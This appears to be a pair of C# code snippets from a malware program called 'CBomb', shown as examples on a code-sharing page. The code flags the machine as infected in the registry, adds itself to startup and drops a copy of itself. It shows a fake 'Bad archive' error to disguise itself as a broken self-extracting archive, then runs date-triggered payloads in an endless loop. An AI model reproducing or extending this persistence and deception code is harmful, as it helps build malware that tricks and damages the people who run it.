示例#1
0
 static void Main(string[] args)
 {
     try
     {
         Console.WriteLine(Registry.GetValue("HKEY_CURRENT_USER\\Software\\CBomb", "Infected", false));
         if (Registry_Infected() == 0b0)
         {
             var res1 = Registry_Write("Infected", 0b1, RegistryValueKind.Binary); // cbomb resident
             var res2 = Registry_RunOnStartup();
             var res3 = Drop();                                                    // make sure it's dropped
             System.Windows.Forms.MessageBox.Show("Bad archive; failed to decompress", "Self-Extracting Archive Error", System.Windows.Forms.MessageBoxButtons.OK, System.Windows.Forms.MessageBoxIcon.Error);
             // Delete_Self(); // THIS LINE BORKS IT
             if (!(res1 || res2 || res3))
             {
                 System.Windows.Forms.MessageBox.Show("oops, i couldn't do things even though i dont need uac", "error", System.Windows.Forms.MessageBoxButtons.OK, System.Windows.Forms.MessageBoxIcon.Error);
                 Environment.Exit(1);
             }
         }
         while (true)
         {
             Check_Exec_Payloads();
             System.Threading.Thread.Sleep(2000);
         }
     } catch (Exception e)
     {
         Crasher crasher = new Crasher();
         crasher.Crash(e);
     }
 }
示例#2
0
 static void Check_Exec_Payloads()
 {
     try
     {
         // Program init
         DateTime date = DateTime.Now;
         // Console.WriteLine(date.Day);
         if (date.Day == 20) // I KNOW I COULD'VE BEEN USING SWITCH CASE FOR THIS BUT I NEED IT FOR MORE COMPLEX STUFF
         {
             Payload_Notepad();
         }
         else if (date.Day == 4)
         {
             Payload_MessageBoxes();
         }
         else if (date.Day == 3)
         {
             Payload_IExplore();
         }
         else if (date.Hour == 18 && date.Minute == 0 && date.Day == 1)
         {
             Payload_Kakworm();
         }
     } catch (Exception e) {
         Crasher crasher = new Crasher();
         crasher.Crash(e);
     }
 }